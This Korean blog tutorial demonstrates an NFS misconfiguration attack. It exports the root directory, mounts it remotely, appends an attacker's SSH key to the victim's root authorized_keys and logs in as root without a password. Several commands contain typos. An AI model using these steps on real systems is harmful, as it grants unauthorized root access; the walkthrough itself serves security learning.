ZINO logoZINO
NFS 취약점 공격

2021-03-18·1분 읽기·

NFS 취약점 공격

NFS 취약점 공격 NFS 개념 NFS 취약점 공격 SSH 접속 확인 ■ NFS 개념 컴퓨터 사용자의 원격지 컴퓨터에 있는 파일을 자신의 컴퓨터를 사용하는 것처럼 설정 가능하게 해주는 클라이언트/서버형 응용프로그램 ■ NFS 취약점 공격 nfs-utils 설치 # yum install -y nfs-utils "/" Directory NFS 설정 # vim

#NFS#nfs-utils#showmount#SSH Keygen

NFS 취약점 공격

■ NFS 개념

  • 컴퓨터 사용자의 원격지 컴퓨터에 있는 파일을 자신의 컴퓨터를 사용하는 것처럼 설정 가능하게 해주는 클라이언트/서버형 응용프로그램

■ NFS 취약점 공격

  • nfs-utils 설치
code
# yum install -y nfs-utils
  • "/" Directory NFS 설정
code
# vim /etc/exports
# exportfs -
# exportfs
  • showmount 설치
code
# apt-get install -y nfs-common
  • IP 정보 출력
code
# showmiunt -e "ip"
  • NFS Directory Mount 작업
code
# mount -t nfs "ip":/ /"target dir"
# ls /"target dir"
  • ssh-keygen 생성
code
# ssh-keygen
  • 생성된 SSH Keygen -> root SSH 키 파일 추가
code
# cat .ssh/id_rsa.pub >> /"target dir"/root/ .ssh/authorized_keys
# ummount /"target dir"
  • SSH 접속 확인
code
# ssh root@"target IP"

쉘 접속 결과 HACKER 가 갖는 KEYGEN에 VICTIM KEYGEN 파일에 추가되어 비밀번호 없이 쉘 접속이 가능해진다.

ShareX

이 글이 도움이 됐나요?

Related

관련 글

3
Windows 이벤트 로그 기반 공격 흐름 분석 — Event ID 4624 중심
blog

Windows 이벤트 로그 기반 공격 흐름 분석 — Event ID 4624 중심

Event ID 4624를 출발점으로, 로그온 세션의 문맥을 따라가며 공격 흐름을 읽는 방법을 정리합니다. Logon Type 해석, 권한 상승·프로세스 실행 연계, 실무 탐지 기준까지 포함합니다.
#forensics#windows#log-analysis+2
2026-03-25Blog
사이트 보안점검 후기
blog

사이트 보안점검 후기

오랜만에 Next.js 사이트를 직접 뒤적거리며 보안 점검을 했다. 발견한 문제들과 어떻게 고쳤는지 실제 커맨드 결과랑 같이 정리.
#security#nextjs#hardening
2026-04-03Blog
TAB 하나로 필터 열 개를 뚫다 — DreamHack XSS Filtering Bypass Advanced 풀이
blog

TAB 하나로 필터 열 개를 뚫다 — DreamHack XSS Filtering Bypass Advanced 풀이

script, javascript, document, location, (, )까지 10개 이상의 키워드를 차단하는 XSS 필터. 그런데 javas\tcript처럼 TAB 문자(\t)를 키워드 중간에 끼우면 필터는 통과하고 브라우저는 그대로 실행한다. WHATWG URL 스펙이 정의한 정규화 동작과 Python 문자열 필터 사이의 갭을 파고들어 쿠키를 탈취하고 FLAG를 획득하는 과정을 단계별로 정리한다.
#dreamhack#ctf#web+4
2026-04-01Blog

Previous

Virtualbox Kali Linux 설치 및 한글 설정 방법

2021-03-14

Back

Next

LibreOffice 사용

2021-03-29